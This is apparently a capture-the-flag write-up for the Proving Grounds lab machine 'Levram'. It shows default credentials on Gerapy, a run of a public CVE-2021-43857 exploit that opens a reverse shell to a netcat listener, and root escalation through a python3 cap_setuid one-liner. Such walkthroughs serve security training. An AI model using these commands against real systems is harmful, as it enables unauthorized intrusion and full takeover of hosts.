Security Analyst | Security Researcher | CRTP

Proving grounds Play: Levram

Proving grounds Practice - Levram CTF writeup.

Nmap

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9bc8f013f855df95cd9fbb615a01e74 (ECDSA)
|_  256 53d97f3d228afd5798fe6b1a4cac7967 (ED25519)
8000/tcp open  http-alt WSGIServer/0.2 CPython/3.10.6
|_http-title: Gerapy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Date: Sat, 07 Oct 2023 11:16:52 GMT
|     Server: WSGIServer/0.2 CPython/3.10.6
|     Content-Type: text/html
|     Content-Length: 9979
|_    Vary: Origin

8000/tcp open http-alt WSGIServer/0.2 CPython/3.10.6

http://192.168.211.24:8000/#/login

img

The application uses default credentials admin:admin and it is vulnerable to Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated).

Note:

If the application doesn’t have any projects the exploit will throw an error, a project must exist for the exploit to work properly.

Initial Foothold

Login to the application using the credentials and create a new project. Now run the exploit and ensure the netcat listener is running.

Exploitation

naveenj@hackerspace:|07:21|~/proving_grounds/Levram/exploit$ python2 exploit.py -t 192.168.211.24 -p 8000 -L 192.168.45.193 -P 4444
  ______     _______     ____   ___ ____  _       _  _  _____  ___ ____ _____ 
 / ___\ \   / / ____|   |___ \ / _ \___ \/ |     | || ||___ / ( _ ) ___|___  |
| |    \ \ / /|  _| _____ __) | | | |__) | |_____| || |_ |_ \ / _ \___ \  / / 
| |___  \ V / | |__|_____/ __/| |_| / __/| |_____|__   _|__) | (_) |__) |/ /  
 \____|  \_/  |_____|   |_____|\___/_____|_|        |_||____/ \___/____//_/   
                                                                              

Exploit for CVE-2021-43857
For: Gerapy < 0.9.8
[*] Resolving URL...
[*] Logging in to application...
[*] Login successful! Proceeding...
[*] Getting the project list
[*] Found project: test
[*] Getting the ID of the project to build the URL
('[*] Found ID of the project: ', 1)
[*] Setting up a netcat listener
listening on [any] 4444 ...
[*] Executing reverse shell payload
[*] Watchout for shell! :)

Reverse Shell Obtained

naveenj@hackerspace:|07:20|~/proving_grounds/Levram/exploit$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.193] from (UNKNOWN) [192.168.211.24] 42252
bash: cannot set terminal process group (845): Inappropriate ioctl for device
bash: no job control in this shell
app@ubuntu:~/gerapy$

Initial Foothold Obtained

Privilege Escalation

Check the extended capabilities in the system.

app@ubuntu:~/gerapy$ getcap -r / 2/dev/null    #get the extended capabilites
/usr/bin/python3.10 cap_setuid=ep   #exploitable

Exploitation

app@ubuntu:/tmp$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
id
uid=0(root) gid=1000(app) groups=1000(app)

Root Obtained

References

Thanks for reading!

For more updates and insights, follow me on Twitter: @thevillagehacker.